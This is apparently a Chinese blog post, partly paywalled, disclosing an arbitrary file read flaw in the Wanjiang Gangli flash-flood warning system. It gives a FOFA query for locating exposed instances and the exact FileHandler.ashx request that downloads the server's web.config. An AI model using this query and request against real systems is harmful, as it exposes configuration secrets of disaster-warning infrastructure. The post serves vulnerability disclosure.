超级会员免费看
本文介绍了万江港利山洪灾害防治预警系统存在的任意文件读取漏洞,该系统集成多种先进技术,但全版本都受到影响。攻击者可以利用漏洞获取敏感信息,例如通过访问特定接口下载源码配置文件。建议关注厂商发布的修复版本并及时更新。
漏洞描述
万江港利山洪灾害防治预警系统软件是对空间信息技术、计算机网络技术、现代通信技术进行无缝集成,结合灾害监测预警的业务需求,采用世界领先GIS地理信息处理技术、RS遥感技术、GPRS/CMDA/3G通讯技术、Microsoft Silverlight Web前端应用程式开发解决方案、以及大容量数据采集技术和大容量数据存储等计算机网络通信与数据处理技术,建立一个用户界面友好的、多终端的、可定制的、集数据采集、存储、分析于一体的综合地理信息平台。该系统存在任意文件读取漏洞,攻击者可获取大量敏感信息
漏洞影响版本
全版本
FOFA:body=”万江港利” && body=”山洪灾害”
漏洞复现
/Service/FileHandler.ashx?Action=Download&FileDirectory=E:/SCWJ/Official/Web/MFCW/&FileName=web.config&FileSourceName=web,拼接路径,访问以上接口地址,可下载其源码配置文件
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
